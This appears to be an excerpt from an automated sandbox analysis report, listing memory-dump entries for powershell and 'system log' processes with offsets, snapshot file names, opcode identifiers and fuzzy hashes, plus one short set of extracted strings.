                                                                      • Source File: 0000000A.00000002.2671786068.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a522c4a6467eb6c8739497ad474d0c1ed798c6633699bacc61cd1c92c6675698
                                                                      • Instruction ID: 9aa49e638ec77e2c6ba48d5dc97d4273e4af1271590293250fb8578f73869c72
                                                                      • Opcode Fuzzy Hash: a522c4a6467eb6c8739497ad474d0c1ed798c6633699bacc61cd1c92c6675698
                                                                      • Instruction Fuzzy Hash: EAC14131E1EA8A5FE79AAB2858145B5BBE0EF16790F1801FED41DCB0D3EE1CA805C355
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2665722903.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fbe42b9f651200fe6e73632f61526c118f9e56bb0b893188a48d13f09a9b080d
                                                                      • Instruction ID: 7246696da1e169df54cfb25986d281d135b0c0241bd48c215a54ff77606ecc30
                                                                      • Opcode Fuzzy Hash: fbe42b9f651200fe6e73632f61526c118f9e56bb0b893188a48d13f09a9b080d
                                                                      • Instruction Fuzzy Hash: 26712670A1CB484FEB58EF1CC885AB97BE0FB95361F14417ED08AC7193DA35A846CB51
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2665722903.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3f20ec4d80d34adf5c930699e4ce1a742aded5996a82e48b0e38d4a968e26ad8
                                                                      • Instruction ID: 9372679ffe1deba14ec618e8e14399ede833b409102a08177248cb31a1115a84
                                                                      • Opcode Fuzzy Hash: 3f20ec4d80d34adf5c930699e4ce1a742aded5996a82e48b0e38d4a968e26ad8
                                                                      • Instruction Fuzzy Hash: C34127A7A1DAC54FD306BB6CA8560EA3FA0EF523D6F0504B7C184C7053EE6944178B96
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2665722903.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 425368cc3aa58d9f26c5fe7173db436246a1784423e4e4034a5e1880e8564ab9
                                                                      • Instruction ID: 63be65c3859fc57093432b6654fc0dc90509464b65b7187cb4be68418d6989dd
                                                                      • Opcode Fuzzy Hash: 425368cc3aa58d9f26c5fe7173db436246a1784423e4e4034a5e1880e8564ab9
                                                                      • Instruction Fuzzy Hash: B331273191CB888FDB0C9B1CAC066A97BE0FB99711F00422FE449D3252CB71A856CBC2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2671786068.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 20f8214dc966a1618e77b21dbaea8329ef355ca0069f889b8a7a0542d4382e24
                                                                      • Instruction ID: b3911b62cf05db746e1069214f58acd5d38418329c6484abee0669c3f23177b7
                                                                      • Opcode Fuzzy Hash: 20f8214dc966a1618e77b21dbaea8329ef355ca0069f889b8a7a0542d4382e24
                                                                      • Instruction Fuzzy Hash: C221DD72E0DAA74FE7AAEB189450174A6D2FF75290F5900BAD01EC72E7CF18EC058349
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2671786068.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f05f1d0f19a95cb40e37c9a67ce4736a3d589a6e9b28fa6330e50a2f0b9cde67
                                                                      • Instruction ID: ae8dedd007896da9302193d49d1ad0480c5dd39d7aa79acd961609682044540b
                                                                      • Opcode Fuzzy Hash: f05f1d0f19a95cb40e37c9a67ce4736a3d589a6e9b28fa6330e50a2f0b9cde67
                                                                      • Instruction Fuzzy Hash: 8A110272D0D9964FE7A8EB2894505B8B7E0FF64360F4900B6D05DC71E7DB18AC208395
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2662044342.00007FF848D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D6D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff848d6d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                      • Instruction ID: 1ca5182d1e2a1edf488471282a9ae4e19db0734e9bc416ec35d176dbdc3ffe31
                                                                      • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                      • Instruction Fuzzy Hash: 00014F3190CE088F9AA4EF1DE48595677E0FB98320710065AD41DC755AE731F891CBC1
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2665722903.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                      • Instruction ID: a525311bf5e0898e04d495dce5ac7619facc0d09e4621ee5b042099af78d6db2
                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                      • Instruction Fuzzy Hash: E701677111CB0D4FDB44EF0CE451AAAB7E0FB95364F50056DE58AC3651DB36E882CB45
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2665722903.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                                      • API String ID: 0-1415242001
                                                                      • Opcode ID: a48a5e8dc6c07f09c0312bb91da70bf2955af60d843af0b839b48b631d2e1ef3
                                                                      • Instruction ID: 0ffbc04d1d9251ee98067eebac0fa1f2cca2d59ab926e4cf3e0412dd034d0b07
                                                                      • Opcode Fuzzy Hash: a48a5e8dc6c07f09c0312bb91da70bf2955af60d843af0b839b48b631d2e1ef3
                                                                      • Instruction Fuzzy Hash: 282107F36849156EC209366DB8415ED7780EF543B8749A1F3E218CF113DF24A48B8A94
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2734773664.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ff848e70000_system log.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16dd020dd9b75b1e4083610875278d4de5f3be011a89fb86e5c236543857733a
                                                                      • Instruction ID: 4a5fe7751ffad8356f07af07daf8da7f96388ba326cfee60a7b01721fc561ec6
                                                                      • Opcode Fuzzy Hash: 16dd020dd9b75b1e4083610875278d4de5f3be011a89fb86e5c236543857733a
                                                                      • Instruction Fuzzy Hash: CC512320A1E6C95FD786AB785864276BFE1EF5725AF0800FBE089C71D7DE285806C346
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2734773664.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ff848e70000_system log.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 39f3da97bb0c05864ccc5f47af8298ed278cddc8943e48faf4942d82acc84be2
                                                                      • Instruction ID: 3081a5efe26a8481b4a2fcae696a68e284592b5fd20180cd203e544e491987ed
                                                                      • Opcode Fuzzy Hash: 39f3da97bb0c05864ccc5f47af8298ed278cddc8943e48faf4942d82acc84be2
                                                                      • Instruction Fuzzy Hash: 8031E522D0DA9A5FE745FB7898A11F9BFB0FF51390F4800BBC089D7293DE2868068354
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2734773664.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ff848e70000_system log.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 382237be0473a45dee267c939396bdbc743c51f69ebcd3c163ad13fec4b52303
                                                                      • Instruction ID: e1e58766fb633285752cda731d3802855fe89e2467a43e09a46f3bd06dfa8a60
                                                                      • Opcode Fuzzy Hash: 382237be0473a45dee267c939396bdbc743c51f69ebcd3c163ad13fec4b52303
                                                                      • Instruction Fuzzy Hash: 55219F21D0CB8E5FE745EB6888A51F9BFB1FF55340F4900BAC04AD72D7DE2868058344
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2734773664.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ff848e70000_system log.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0b16f98484cbd8c42a76da09035f4297df30a6a17c599e42abebb619a2f709c9
                                                                      • Instruction ID: 8b066a665b66f89ca70c2ad979bcc83545818a19c67e6a1e2f285005ae100c38
                                                                      • Opcode Fuzzy Hash: 0b16f98484cbd8c42a76da09035f4297df30a6a17c599e42abebb619a2f709c9
                                                                      • Instruction Fuzzy Hash: 0C71A530A2DA595FDB98FB7894696FD76E2FF95340F440478E00EC32CADE3998118754
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2734773664.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ff848e70000_system log.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fa3734fed02322d4c59a4e1a2623863e768af843c6989fb95b120995256688e5
                                                                      • Instruction ID: 3a779f6202222450e571c52654ba32ad1041994abb460a5bbbd35bd12886a986
                                                                      • Opcode Fuzzy Hash: fa3734fed02322d4c59a4e1a2623863e768af843c6989fb95b120995256688e5
                                                                      • Instruction Fuzzy Hash: 2F514821A0EA865FE396B77C98552B57FE1EF86660B0900FBD48CC7193DD1C9C438356
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2734773664.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ff848e70000_system log.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 65e4caa21e642577595938158ff88585ee4ae888e014b826e4636b2ec5769a47
                                                                      • Instruction ID: 2c14281249ca59e1fbc17412fbbbd6a5394d1756de26f4e694ba9de7cd9ad484
                                                                      • Opcode Fuzzy Hash: 65e4caa21e642577595938158ff88585ee4ae888e014b826e4636b2ec5769a47
                                                                      • Instruction Fuzzy Hash: 1D31E320B1D9495FE798FB3C9859379B6C2EB98795F0401BEE00EC32D7DE289C028745
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2734773664.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ff848e70000_system log.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c7ed36243e80cbeddebf88a352ef979d9f899729e00d049abb7ff59be7712f93
                                                                      • Instruction ID: 16eb43638952863e0e67cc352de8995a8ae823ac72d6271920f2bc7e48b2857c
                                                                      • Opcode Fuzzy Hash: c7ed36243e80cbeddebf88a352ef979d9f899729e00d049abb7ff59be7712f93
                                                                      • Instruction Fuzzy Hash: 2331F261F1CA495FE788B7BC585A3B9B7E1FB98751F044276E00DC3282DE2858018B51
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2734773664.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ff848e70000_system log.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e5c8b1cd3a53019467139e7dd30b26d67704e0527d53ba87730b435cae45e6f4
                                                                      • Instruction ID: 89198bb4f528fdafaa1b8edbf7bb40373d7fc343947faa341a2c1de3a5b34e55
                                                                      • Opcode Fuzzy Hash: e5c8b1cd3a53019467139e7dd30b26d67704e0527d53ba87730b435cae45e6f4
                                                                      • Instruction Fuzzy Hash: EA31C270A1991D9FEB48FBB8D8656EDB7E1FF98300F540475D009C328ADE38A8018B54
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2734773664.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ff848e70000_system log.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b7f161fbb192e92de44a456c4cfa24dd3bce407a275e324ac3d83886d66d810e
                                                                      • Instruction ID: d2a54ee8fe6d51688b944a76867d5e2e74375572ecc870c2245772254913e0e5
                                                                      • Opcode Fuzzy Hash: b7f161fbb192e92de44a456c4cfa24dd3bce407a275e324ac3d83886d66d810e
                                                                      • Instruction Fuzzy Hash: D221F5619899595FE349EB6C98995EC3FF1FF99300F8444A5D40AC33DFDE24E8008B65
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2734773664.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ff848e70000_system log.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 82d41f96a376e290cfd19d6d3de13cc035c2388c401a774344ed6856aca338a1
                                                                      • Instruction ID: d8bbcf6309abc606dca7091a2ce8fbbb5c54b196ceceaf3e16eca1f93c997143
                                                                      • Opcode Fuzzy Hash: 82d41f96a376e290cfd19d6d3de13cc035c2388c401a774344ed6856aca338a1
                                                                      • Instruction Fuzzy Hash: 06012610C0D7C44FE752BB38581547A7FF0EFA2380F0804ABE888C609BDA25A9448396